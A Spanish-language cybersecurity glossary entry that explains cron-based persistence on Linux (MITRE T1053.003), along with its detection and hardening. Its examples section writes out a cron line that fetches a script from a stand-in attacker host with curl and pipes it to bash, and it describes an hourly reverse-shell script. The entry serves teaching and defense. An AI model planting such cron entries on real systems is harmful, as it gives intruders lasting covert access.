Skip to content
Vol. 1 · Ed. 2026
CyberGlossary
Entry № 238

Persistencia mediante cron

¿Qué es Persistencia mediante cron?

Persistencia mediante cronTécnica de persistencia en Linux y Unix que utiliza cron, anacron o temporizadores de systemd para reejecutar código del atacante en un intervalo o evento del sistema.


La persistencia por cron (MITRE ATT&CK T1053.003) ataca al demonio cron de Unix y sus variantes (anacron, fcron, systemd-timer). Los atacantes añaden entradas en /etc/crontab, /etc/cron.d/, /etc/cron.{hourly,daily,weekly,monthly}/ o crontabs por usuario (crontab -e). Cargas habituales son reverse shells de una línea, descargas con curl o scripts en /tmp. Como cron se ejecuta como root o como el usuario propietario, la técnica es fiable y trivial tras el acceso inicial. Detección: monitorización de integridad de directorios cron, reglas auditd, baseline de trabajos esperados y alertas EDR sobre shells lanzadas por cron. Endurecimiento: limitar la pertenencia a crontab, montar /tmp con noexec y activar auditoría de systemd-cron cuando esté disponible.

Ejemplos

  1. 01

    Añadir * * * * * curl -s http://atacante/sh | bash en /etc/cron.d/update.

  2. 02

    Colocar un script en /etc/cron.hourly/ para reabrir una reverse shell cada hora.

Preguntas frecuentes

¿Qué es Persistencia mediante cron?

Técnica de persistencia en Linux y Unix que utiliza cron, anacron o temporizadores de systemd para reejecutar código del atacante en un intervalo o evento del sistema. Pertenece a la categoría de Ataques y amenazas en ciberseguridad.

¿Qué significa Persistencia mediante cron?

Técnica de persistencia en Linux y Unix que utiliza cron, anacron o temporizadores de systemd para reejecutar código del atacante en un intervalo o evento del sistema.

¿Cómo funciona Persistencia mediante cron?

La persistencia por cron (MITRE ATT&CK T1053.003) ataca al demonio cron de Unix y sus variantes (anacron, fcron, systemd-timer). Los atacantes añaden entradas en /etc/crontab, /etc/cron.d/, /etc/cron.{hourly,daily,weekly,monthly}/ o crontabs por usuario (crontab -e). Cargas habituales son reverse shells de una línea, descargas con curl o scripts en /tmp. Como cron se ejecuta como root o como el usuario propietario, la técnica es fiable y trivial tras el acceso inicial. Detección: monitorización de integridad de directorios cron, reglas auditd, baseline de trabajos esperados y alertas EDR sobre shells lanzadas por cron. Endurecimiento: limitar la pertenencia a crontab, montar /tmp con noexec y activar auditoría de systemd-cron cuando esté disponible.

¿Cómo defenderse de Persistencia mediante cron?

Las defensas contra Persistencia mediante cron combinan habitualmente controles técnicos y prácticas operativas, como se detalla en la definición.

¿Cuáles son otros nombres para Persistencia mediante cron?

Nombres alternativos comunes: Persistencia crontab, Persistencia anacron.

Términos relacionados